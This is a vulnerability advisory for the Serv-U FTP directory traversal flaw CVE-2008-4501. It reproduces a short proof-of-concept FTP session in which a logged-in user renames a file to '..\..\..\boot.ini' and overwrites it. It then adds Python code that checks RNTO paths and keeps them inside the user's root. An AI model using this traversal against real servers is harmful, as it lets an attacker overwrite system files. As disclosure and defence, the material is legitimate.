Serv-U FTP Server Directory Traversal Vulnerability

Vulnerability ID: 1116328    Vulnerability type: Path traversal
Published: 2008-10-03    Updated: 2008-10-08
CVE ID: CVE-2008-4501    CNNVD-ID: CNNVD-200810-127
Platform: Windows    CVSS score: 9.0
|Vulnerability sources
https://www.exploit-db.com/exploits/6661
https://www.securityfocus.com/bid/84767
https://cxsecurity.com/issue/WLB-2008100136
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-127
|Vulnerability details
A directory traversal vulnerability exists in the FTP server of Serv-U 7.0.0.1 through 7.3, including 7.2.0.1. A remote authenticated user can overwrite or create arbitrary files by supplying ..\ (dot dot backslash) sequences in the RNTO command.
|Vulnerability EXP
#Serv-U <= 7.2.0.1 / 7.3 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewritten

# milw0rm.com [2008-10-03]
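The session above shows the server accepting a rename target that walks out of the user's home with ..\ segments. The following is an added example (not Serv-U's code and not from the original advisory) of the check a server should apply to an RNTO argument before acting on it: fold both separator styles, strip any drive letter, collapse the path, and refuse anything that resolves outside the account's root. The root directory, the resolve_ftp_path and handle_rnto function names, and the reply texts are assumptions for illustration.

```python
import posixpath
from typing import Optional

# Hypothetical per-user root for this example; a real server would take it
# from the account's configured home directory.
USER_ROOT = "/srv/ftp/test"


def resolve_ftp_path(user_root: str, requested: str) -> Optional[str]:
    """Map a client-supplied FTP path onto the user's root directory.

    Returns the confined absolute path, or None when the request would
    escape user_root. Backslashes are folded to '/' first, because a
    Windows server treats '..\\' exactly like '../', so a check that only
    looks for '../' would miss the traversal shown in the session above.
    """
    rel = requested.replace("\\", "/")
    # Client paths are always interpreted relative to the user's root,
    # never as absolute OS paths, so drop any drive letter and leading '/'.
    if len(rel) >= 2 and rel[1] == ":":
        rel = rel[2:]
    rel = rel.lstrip("/")
    # Collapse '.' and '..' segments, then confirm we are still under root.
    root = posixpath.normpath(user_root)
    candidate = posixpath.normpath(posixpath.join(root, rel))
    # The trailing '/' prevents '/srv/ftp/test2' matching root '/srv/ftp/test'.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def handle_rnto(user_root: str, target: str) -> str:
    """Build the reply an FTP server would send for an RNTO argument."""
    resolved = resolve_ftp_path(user_root, target)
    if resolved is None:
        # Reject instead of silently clamping, so the attempt is visible in logs.
        return "550 Destination path outside home directory."
    return f"250 RNTO command successful. ({resolved})"


if __name__ == "__main__":
    # Constructed sample inputs: the traversal from the transcript plus two
    # legitimate renames that stay inside the home directory.
    for arg in ["..\\..\\..\\boot.ini", "upload/../report.txt", "C:\\Windows\\win.ini"]:
        print(f"rnto {arg!r} -> {handle_rnto(USER_ROOT, arg)}")
```

The drive-letter and leading-slash stripping makes an absolute Windows path such as C:\Windows\win.ini land harmlessly under the user's root rather than being rejected, which matches how an FTP virtual filesystem is normally presented; if a deployment prefers to refuse such requests outright, return None at that point instead.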
|References

Source: VUPEN
Name: ADV-2008-2746
Link: http://www.frsirt.com/english/advisories/2008/2746
Source: MILW0RM
Name: 6661
Link: http://www.milw0rm.com/exploits/6661
Source: SREASON
Name: 4378
Link: http://securityreason.com/securityalert/4378
Source: SECUNIA
Name: 32150
Link: http://secunia.com/advisories/32150